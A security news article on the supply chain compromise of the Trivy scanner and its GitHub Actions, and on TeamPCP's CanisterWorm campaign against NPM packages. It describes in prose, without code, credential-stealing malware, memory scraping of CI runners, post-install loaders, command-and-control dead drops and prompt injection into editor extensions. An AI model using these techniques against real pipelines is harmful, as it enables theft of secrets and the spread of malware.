A threat actor compromised Aqua Security’s Trivy open source vulnerability scanner in a supply chain attack that started in late February.
On March 1, Trivy’s maintainers announced that the scanner’s GitHub repository had been compromised in an attack involving a GitHub Actions workflow issue. Some releases were deleted, and malicious versions of the application’s VS Code extensions were published to the Open VSIX marketplace.
The attack was part of a larger, automated attack campaign that hit multiple open source repositories via GitHub Actions workflows and resulted in a large natural-language prompt being injected into two malicious versions of Trivy’s VS Code extension.
Credentials exfiltrated during the initial incident were used last week in a new supply chain attack that targeted not only the Trivy package but also trivy-action and setup-trivy, Trivy’s maintainers have confirmed in a March 21 advisory.
“Following the initial disclosure on March 1, credential rotation was performed, but was not atomic (not all credentials were revoked simultaneously). The attacker could have used a valid token to exfiltrate newly rotated secrets during the rotation window (which lasted a few days),” the maintainers explain.
The attackers used the compromised credentials to push a malicious Trivy release (version v0.69.4) that was distributed across all regular channels, including GitHub Container Registry, Amazon ECR Public, and Docker Hub.
They also force-pushed 76 of 77 trivy-action version tags to malicious commits, leading to infections with an information stealer designed to dump the Runner.Worker process memory and extract all secrets from it.
The malware was also designed to encrypt the harvested data and send it to a remote server. If the exfiltration failed, it created a public GitHub repository and uploaded the data to it.
Additionally, the attackers targeted the setup-trivy releases, force-pushing all tags to malicious commits, leading to the same infostealer. Socket and Wiz published technical details on the attack and the malware.
Ongoing attack
According to Aqua, none of its commercial products that use Trivy have been affected by the attack, as “the forked version of Aqua’s commercial platform lags Trivy open source with a controlled integration process.”
On Monday, the company warned that the attack is ongoing and evolving, with suspicious activity identified on March 22, “involving unauthorized changes and repository tampering”.
“Based on our current understanding, this activity is consistent with the attacker’s previously observed behavior. Our investigation is actively focused on validating that all access paths have been identified and fully closed,” Aqua said.
Trivy’s maintainers released clean iterations of Trivy (versions v0.69.2 and v0.69.3), trivy-action (v0.35.0), and setup-trivy (v0.2.6). Because the original trivy-action tags were deleted during remediation, new tags with a v prefix were published.
They urge all users to rotate all credentials, tokens, and other secrets if a compromised version of Trivy, trivy-action, or setup-trivy ran on their environments.
“Check whether your organization pulled or executed Trivy v0.69.4 from any source. Remove any affected artifacts immediately. Look for repositories named tpcp-docs in your GitHub organization. The presence of such a repository may indicate that the fallback exfiltration mechanism was triggered and secrets were successfully stolen,” the maintainers note.
TeamPCP’s CanisterWorm campaign
The attack has been linked to a threat actor named TeamPCP, which has expanded its activity following the Trivy compromise, targeting the NPM ecosystem with the CanisterWorm malware.
Last week, Aikido reported that TeamPCP compromised over 45 NPM packages, injecting them with a post-install loader that fetches a persistent Python backdoor, enabling dynamic payload delivery via an ICP canister used for command-and-control (C&C) dead-drop.
CanisterWorm, the security firm says, can extract NPM tokens, resolve usernames, enumerate published packages, create new package versions, and publish the payload across all of them.
It also establishes persistence, contains evasion capabilities, masquerades as PostgreSQL tooling, polls the ICP canister every 50 minutes, and can be disarmed by pointing the canister to a YouTube link.
“If the attacker updates the canister to point to a new URL, every infected machine picks up the new binary on its next poll. The old binary keeps running in the background since the script never kills previous processes,” Aikido explains.
The infected packages contain a standalone self-propagating tool that appears to be entirely vibe-coded and does not use obfuscation, and which uses stolen tokens to spread the malicious payload across packages.
Financially motivated, TeamPCP emerged in late 2025, targeting cloud-native infrastructure via exposed CI/CD pipelines, Docker APIs, and Kubernetes clusters.
The threat actor is known for mounting supply chain attacks and for leveraging credentials stolen from cloud workloads and GitHub Actions runners via memory scrapers.
Related: ForceMemo: Python Repositories Compromised in GlassWorm Aftermath
Related: Polyfill Supply Chain Attack Impacting 100k Sites Linked to North Korea
Related: New ‘Sandworm_Mode’ Supply Chain Attack Hits NPM
Related: Over 100 GitHub Repositories Distributing BoryptGrab Stealer
